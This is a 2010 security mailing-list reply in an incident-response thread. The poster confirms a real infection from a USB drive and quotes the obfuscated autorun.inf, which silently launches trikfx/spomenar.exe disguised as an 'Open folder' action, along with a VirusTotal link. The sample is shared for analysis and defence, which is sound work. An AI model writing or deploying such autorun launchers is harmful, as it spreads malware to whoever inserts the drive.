Re: Incident Response

[Craig Freyman <craigfreyman () gmail com>]

Not a false positive. Someone used a nasty USB drive that had an autorun
virus on it. The autorun.inf had this in it:

l~-??A?<K??#?Ê??ed?ª?üXÜ??ÁüFl?æ?eëX?r?:M?à???Ñ?çs?Ç?Oü?EF??ëÓ??ÚÞÊN?d=?ú??[Y?????mÈm!Ã???çñvè?y?Êv_????É-/?Is?ù?,[
[autorun
;e???V
open=trikfx/spomenar.exe
;Þm÷?Ç
icon=%SystemRoot%\system32\SHELL32.dll,4
;X]doÝ??a
action=Open folder to view files using Windows Explorer
;?ëë$???µ]
shell\\open\\\command=trikfx/spomenar.exe
;Là?ÿÜ??Üü`ásáµ????Dþ?é'?µ??rm?ò?
shell\\explore\\command=trikfx/spomenar.exe
;??àg'æë?
useautoplay=1

VirusTotal for this file:
http://www.virustotal.com/analisis/e22b8e9b4fbdb876904373e647306a3f0a8d2c5bbb50e708a87464c83c962dba-1277992532


On Wed, Jun 30, 2010 at 4:06 PM, Mike Patterson <mike () snowcrash ca> wrote:

> On 10-06-30 12:05 PM, Craig Freyman wrote:
> > When the AV flags a virus, what steps should you take to handle the
> > situation?
> >
> > I would assume the following would be important to figure out:
> [...]
> >    - ??
>
> First and foremost: is this a false positive?
>
> Other than that, Josh Little's response is good.
>
> Mike
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom () mail pauldotcom com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com